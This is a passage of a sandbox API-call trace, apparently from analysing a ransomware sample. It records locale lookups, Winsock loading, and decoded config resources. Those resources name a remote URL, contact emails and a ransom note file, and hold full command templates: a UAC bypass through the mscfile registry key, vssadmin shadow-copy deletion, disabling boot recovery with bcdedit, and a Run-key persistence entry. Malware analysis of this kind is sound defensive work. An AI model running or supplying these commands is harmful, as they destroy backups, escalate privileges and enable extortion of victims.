lpLCData=0x12f7d0, cchData=256 | out: lpLCData="August") returned 7 [0174.915] GetLocaleInfoW (in: Locale=0x409, LCType=0x4c, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Sep") returned 4 [0174.915] GetLocaleInfoW (in: Locale=0x409, LCType=0x40, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="September") returned 10 [0174.915] GetLocaleInfoW (in: Locale=0x409, LCType=0x4d, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Oct") returned 4 [0174.915] GetLocaleInfoW (in: Locale=0x409, LCType=0x41, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="October") returned 8 [0174.915] GetLocaleInfoW (in: Locale=0x409, LCType=0x4e, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Nov") returned 4 [0174.915] GetLocaleInfoW (in: Locale=0x409, LCType=0x42, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="November") returned 9 [0174.915] GetLocaleInfoW (in: Locale=0x409, LCType=0x4f, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Dec") returned 4 [0174.915] GetLocaleInfoW (in: Locale=0x409, LCType=0x43, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="December") returned 9 [0174.915] GetLocaleInfoW (in: Locale=0x409, LCType=0x14, lpLCData=0x12f820, cchData=256 | out: lpLCData="$") returned 2 [0174.915] GetLocaleInfoW (in: Locale=0x409, LCType=0x1b, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0174.915] GetLocaleInfoW (in: Locale=0x409, LCType=0x1c, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0174.915] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12fa18, cchData=2 | out: lpLCData=",") returned 2 [0174.916] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12fa18, cchData=2 | out: lpLCData=".") returned 2 [0174.916] GetLocaleInfoW (in: Locale=0x409, LCType=0x19, lpLCData=0x12f820, cchData=256 | out: lpLCData="2") returned 2 [0174.916] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12fa18, cchData=2 | out: lpLCData="/") returned 2 [0174.916] GetLocaleInfoW (in: Locale=0x409, LCType=0x1f, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0174.916] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="1") returned 2 [0174.916] GetLocaleInfoW (in: Locale=0x409, LCType=0x20, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0174.916] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="1") returned 2 [0174.916] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12fa18, cchData=2 | out: lpLCData=":") returned 2 [0174.916] GetLocaleInfoW (in: Locale=0x409, LCType=0x28, lpLCData=0x12f820, cchData=256 | out: lpLCData="AM") returned 3 [0174.916] GetLocaleInfoW (in: Locale=0x409, LCType=0x29, lpLCData=0x12f820, cchData=256 | out: lpLCData="PM") returned 3 [0174.916] GetLocaleInfoW (in: Locale=0x409, LCType=0x25, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0174.916] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0174.916] GetLocaleInfoW (in: Locale=0x409, LCType=0x1005, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0174.916] GetLocaleInfoW (in: Locale=0x409, LCType=0xc, lpLCData=0x12fa18, cchData=2 | out: lpLCData=",") returned 2 [0174.916] LoadLibraryW (lpLibFileName="ws2_32.dll") returned 0x77380000 [0174.942] GetProcAddress (hModule=0x77380000, lpProcName="WSAIoctl") returned 0x77382fe7 [0174.942] GetProcAddress (hModule=0x77380000, lpProcName="__WSAFDIsSet") returned 0x77386a8a [0174.942] GetProcAddress (hModule=0x77380000, lpProcName="closesocket") returned 0x77383918 [0174.942] GetProcAddress (hModule=0x77380000, lpProcName="ioctlsocket") returned 0x77383084 [0174.942] GetProcAddress (hModule=0x77380000, lpProcName="WSAGetLastError") returned 0x773837ad [0174.942] GetProcAddress (hModule=0x77380000, lpProcName="WSAStartup") returned 0x77383ab2 [0174.942] GetProcAddress (hModule=0x77380000, lpProcName="WSACleanup") returned 0x77383c5f [0174.942] GetProcAddress (hModule=0x77380000, lpProcName="accept") returned 0x773868b6 [0174.942] GetProcAddress (hModule=0x77380000, lpProcName="bind") returned 0x77384582 [0174.942] GetProcAddress (hModule=0x77380000, lpProcName="connect") returned 0x77386bdd [0174.942] GetProcAddress (hModule=0x77380000, lpProcName="getpeername") returned 0x77387147 [0174.942] GetProcAddress (hModule=0x77380000, lpProcName="getsockname") returned 0x773830af [0174.942] GetProcAddress (hModule=0x77380000, lpProcName="getsockopt") returned 0x7738737d [0174.943] GetProcAddress (hModule=0x77380000, lpProcName="htonl") returned 0x77382d57 [0174.943] GetProcAddress (hModule=0x77380000, lpProcName="htons") returned 0x77382d8b [0174.943] GetProcAddress (hModule=0x77380000, lpProcName="inet_addr") returned 0x7738311b [0174.943] GetProcAddress (hModule=0x77380000, lpProcName="inet_ntoa") returned 0x7738b131 [0174.943] GetProcAddress (hModule=0x77380000, lpProcName="listen") returned 0x7738b001 [0174.943] GetProcAddress (hModule=0x77380000, lpProcName="ntohl") returned 0x77382d57 [0174.943] GetProcAddress (hModule=0x77380000, lpProcName="ntohs") returned 0x77382d8b [0174.943] GetProcAddress (hModule=0x77380000, lpProcName="recv") returned 0x77386b0e [0174.943] GetProcAddress (hModule=0x77380000, lpProcName="recvfrom") returned 0x7738b6dc [0174.943] GetProcAddress (hModule=0x77380000, lpProcName="select") returned 0x77386989 [0174.943] GetProcAddress (hModule=0x77380000, lpProcName="send") returned 0x77386f01 [0174.943] GetProcAddress (hModule=0x77380000, lpProcName="sendto") returned 0x773834b5 [0174.943] GetProcAddress (hModule=0x77380000, lpProcName="setsockopt") returned 0x773841b6 [0174.943] GetProcAddress (hModule=0x77380000, lpProcName="shutdown") returned 0x7738449d [0174.944] GetProcAddress (hModule=0x77380000, lpProcName="socket") returned 0x77383eb8 [0174.944] GetProcAddress (hModule=0x77380000, lpProcName="gethostbyaddr") returned 0x77396c01 [0174.944] GetProcAddress (hModule=0x77380000, lpProcName="gethostbyname") returned 0x77397673 [0174.944] GetProcAddress (hModule=0x77380000, lpProcName="getprotobyname") returned 0x773968b3 [0174.944] GetProcAddress (hModule=0x77380000, lpProcName="getprotobynumber") returned 0x773967c4 [0174.944] GetProcAddress (hModule=0x77380000, lpProcName="getservbyname") returned 0x77396ef3 [0174.944] GetProcAddress (hModule=0x77380000, lpProcName="getservbyport") returned 0x77396d62 [0174.944] GetProcAddress (hModule=0x77380000, lpProcName="gethostname") returned 0x7738a05b [0174.944] GetProcAddress (hModule=0x77380000, lpProcName="getaddrinfo") returned 0x77384296 [0174.944] GetProcAddress (hModule=0x77380000, lpProcName="freeaddrinfo") returned 0x77384b1b [0174.944] GetProcAddress (hModule=0x77380000, lpProcName="getnameinfo") returned 0x773867b7 [0174.944] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x4e9ec0 | out: lpWSAData=0x4e9ec0) returned 0 [0174.950] GetACP () returned 0x4e4 [0174.950] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12fc28 | out: lpCPInfo=0x12fc28) returned 1 [0174.950] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fa5c, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\wspgagwn.exe")) returned 0x30 [0174.950] GetTickCount () returned 0x32de2 [0174.950] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc38 | out: lpPerformanceCount=0x12fc38*=23173996971) returned 1 [0174.951] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x4b\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0174.951] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x51\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0174.951] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x6a\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0174.951] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x57\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0174.951] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x45\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0174.951] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x59\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0174.951] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x75\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0174.951] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x58\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0174.951] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x79\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0174.951] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x56\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0174.951] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x76\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0174.951] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x68\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0174.951] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x36\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0174.951] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x73\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0174.951] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x67\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0174.951] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x56\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0174.951] LoadStringW (in: hInstance=0x400000, uID=0xff66, lpBuffer=0x12dbd4, cchBufferMax=4096 | out: lpBuffer="32-bit Edition") returned 0xe [0174.951] LoadStringW (in: hInstance=0x400000, uID=0xff65, lpBuffer=0x12dbd0, cchBufferMax=4096 | out: lpBuffer="%s Service Pack %4:d (Version %1:d.%2:d, Build %3:d, %5:s)") returned 0x3a [0174.951] LoadStringW (in: hInstance=0x400000, uID=0xff66, lpBuffer=0x12dbd4, cchBufferMax=4096 | out: lpBuffer="32-bit Edition") returned 0xe [0174.952] LoadStringW (in: hInstance=0x400000, uID=0xff65, lpBuffer=0x12dbd0, cchBufferMax=4096 | out: lpBuffer="%s Service Pack %4:d (Version %1:d.%2:d, Build %3:d, %5:s)") returned 0x3a [0174.952] FindResourceW (hModule=0x400000, lpName="CFG", lpType=0xa) returned 0x51c308 [0174.952] LoadResource (hModule=0x400000, hResInfo=0x51c308) returned 0x50d55c [0174.952] SizeofResource (hModule=0x400000, hResInfo=0x51c308) returned 0xef [0174.952] LockResource (hResData=0x50d55c) returned 0x50d55c [0174.952] FreeResource (hResData=0x50d55c) returned 0 [0174.952] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0174.952] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0174.952] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0174.952] LockResource (hResData=0x50d64c) returned 0x50d64c [0174.952] GetCPInfo (in: CodePage=0xfde9, lpCPInfo=0x12fa3c | out: lpCPInfo=0x12fa3c) returned 1 [0174.952] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1414f60, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0174.952] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1414f60, cbMultiByte=38, lpWideCharStr=0x140de4c, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0174.952] FreeResource (hResData=0x50d64c) returned 0 [0174.952] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0174.952] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x1414f64, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0174.952] GetCurrentThreadId () returned 0x728 [0174.952] GetCurrentThreadId () returned 0x728 [0174.952] GetCurrentThreadId () returned 0x728 [0174.952] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13ccd18, cbMultiByte=239, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 239 [0174.952] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13ccd18, cbMultiByte=239, lpWideCharStr=0x13d2e7c, cchWideChar=239 | out: lpWideCharStr="13StarterProcessMutex4\r\n24MainProcessMutex5\r\n35Brother1ProcessMutex6\r\n46Brother2ProcessMutex7\r\n300\r\nCOSLb0cVd9bCx1vp\r\nhttp://statcs.s76.r53.com.ua\r\n131072\r\nbluetablet9643@yahoo.com\r\ndecodedecode@yandex.ru\r\nBl0cked-ReadMe.rtf\r\ndesktop.ini\r\n") returned 239 [0174.953] GetCurrentThreadId () returned 0x728 [0174.953] GetCurrentThreadId () returned 0x728 [0174.953] GetCurrentThreadId () returned 0x728 [0174.953] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"100_OK\" \"60000\"" [0174.953] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x13c399c, nSize=0x8000 | out: lpDst="C:\\Users\\EEBsYm5") returned 0x11 [0174.953] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x13c399c, nSize=0x8000 | out: lpDst="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp") returned 0x24 [0174.953] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 1 [0174.955] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Local") returned 1 [0174.956] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=7, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 1 [0174.957] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=24, fCreate=0 | out: pszPath="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 1 [0174.958] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=0, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0174.958] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=25, fCreate=0 | out: pszPath="C:\\Users\\Public\\Desktop") returned 1 [0174.959] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=32, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files") returned 1 [0174.960] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=41, fCreate=0 | out: pszPath="C:\\Windows\\system32") returned 1 [0174.961] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=40, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5") returned 1 [0174.963] ExpandEnvironmentStringsW (in: lpSrc="%COMPUTERNAME%", lpDst=0x13ac63c, nSize=0x8000 | out: lpDst="CRH2YWU7") returned 0x9 [0174.963] ExpandEnvironmentStringsW (in: lpSrc="%USERNAME%", lpDst=0x13ac63c, nSize=0x8000 | out: lpDst="EEBsYm5") returned 0x8 [0174.963] ExpandEnvironmentStringsW (in: lpSrc="%APPDATA%", lpDst=0x13ac63c, nSize=0x8000 | out: lpDst="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x21 [0174.963] ExpandEnvironmentStringsW (in: lpSrc="%ALLUSERSPROFILE%", lpDst=0x13ac63c, nSize=0x8000 | out: lpDst="C:\\ProgramData") returned 0xf [0174.963] FindResourceW (hModule=0x400000, lpName="CMDS", lpType=0xa) returned 0x51c380 [0174.963] LoadResource (hModule=0x400000, hResInfo=0x51c380) returned 0x50d72c [0174.963] SizeofResource (hModule=0x400000, hResInfo=0x51c380) returned 0x582 [0174.964] LockResource (hResData=0x50d72c) returned 0x50d72c [0174.964] FreeResource (hResData=0x50d72c) returned 0 [0174.964] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0174.964] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0174.964] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0174.964] LockResource (hResData=0x50d64c) returned 0x50d64c [0174.964] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1415008, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0174.964] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1415008, cbMultiByte=38, lpWideCharStr=0x140deac, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0174.964] FreeResource (hResData=0x50d64c) returned 0 [0174.964] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0174.964] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x141500c, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0174.964] GetCurrentThreadId () returned 0x728 [0174.964] GetCurrentThreadId () returned 0x728 [0174.964] GetCurrentThreadId () returned 0x728 [0174.964] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13ae688, cbMultiByte=1410, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 1410 [0174.964] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13ae688, cbMultiByte=1410, lpWideCharStr=0x13c9afc, cchWideChar=1410 | out: lpWideCharStr="%CD%\r\n%SystemRoot%\\system32\\cmd.exe\r\n%SystemRoot%\\system32\\shell32.dll\r\nreg copy \"HKCR\\mscfile\" \"HKCU\\Software\\Classes\\mscfile\" /s /f && reg add \"HKCU\\Software\\Classes\\mscfile\\shell\\open\\command\" /ve /t REG_EXPAND_SZ /d \"[MAIN_PATH]\" /f && \"[AE_PATH]\" & reg delete \"HKCU\\Software\\Classes\\mscfile\" /f\r\nprocess call create \"cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\"\r\nvssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\r\nCACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"\r\nreg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"[HTA_NAME]\" /t REG_SZ /f /d \"\\\"[HTA_PATH]\"\\\"\r\ntype \"[FROM_PATH]\" > \"[TO_PATH]\"\r\ntype \"[FROM_PATH]\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]\r\nattrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"\r\nexplorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"\r\nreg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /f && reg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /v \"29\" /t REG_SZ /f /d \"[ICO_PATH],0\"\r\ntaskkill /f /IM explorer.exe && start explorer.exe\r\n") returned 1410 [0174.965] GetCurrentThreadId () returned 0x728 [0174.965] GetCurrentThreadId () returned 0x728 [0174.965] GetCurrentThreadId () returned 0x728 [0174.965] GetCurrentThread () returned 0xfffffffe [0174.965] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x8, OpenAsSelf=1, TokenHandle=0x12fc64 | out: TokenHandle=0x12fc64*=0x0) returned 0 [0174.965] GetLastError () returned 0x3f0 [0174.965] GetCurrentProcess () returned 0xffffffff [0174.965] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x12fc64 | out: TokenHandle=0x12fc64*=0xb8) returned 1 [0174.965] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x2, TokenInformation=0x13c7ae0, TokenInformationLength=0x400, ReturnLength=0x12fc60 | out: TokenInformation=0x13c7ae0, ReturnLength=0x12fc60) returned 1 [0174.965] CloseHandle (hObject=0xb8) returned 1 [0174.965] AllocateAndInitializeSid (in: pIdentifierAuthority=0x4e3754, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x12fc5c | out: pSid=0x12fc5c*=0x2c6438*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0174.965] EqualSid (pSid1=0x2c6438*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x13c7b44*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 0 [0174.965] EqualSid (pSid1=0x2c6438*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x13c7b60*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 0 [0174.965] EqualSid (pSid1=0x2c6438*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x13c7b6c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0174.965] GetCurrentProcess () returned 0xffffffff [0174.965] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x12fc68 | out: TokenHandle=0x12fc68*=0xb8) returned 1 [0174.965] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x12fc64 | out: TokenInformation=0x0, ReturnLength=0x12fc64) returned 0 [0174.965] GetLastError () returned 0x7a [0174.965] LocalAlloc (uFlags=0x0, uBytes=0x14) returned 0x2c76d8 [0174.965] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x2c76d8, TokenInformationLength=0x14, ReturnLength=0x12fc64 | out: TokenInformation=0x2c76d8, ReturnLength=0x12fc64) returned 1 [0174.965] GetSidSubAuthorityCount (pSid=0x2c76e0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 0x2c76e1 [0174.965] GetSidSubAuthority (pSid=0x2c76e0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000), nSubAuthority=0x0) returned 0x2c76e8 [0174.965] LocalFree (hMem=0x2c76d8) returned 0x0 [0174.965] CloseHandle (hObject=0xb8) returned 1 [0174.965] GetDriveTypeW (lpRootPathName="Z:\\") returned 0x1 [0174.966] GetDriveTypeW (lpRootPathName="Y:\\") returned 0x1 [0174.966] GetDriveTypeW (lpRootPathName="X:\\") returned 0x1 [0174.966] GetDriveTypeW (lpRootPathName="W:\\") returned 0x1 [0174.966] GetDriveTypeW (lpRootPathName="V:\\") returned 0x1 [0174.966] GetDriveTypeW (lpRootPathName="U:\\") returned 0x1 [0174.966] GetDriveTypeW (lpRootPathName="T:\\") 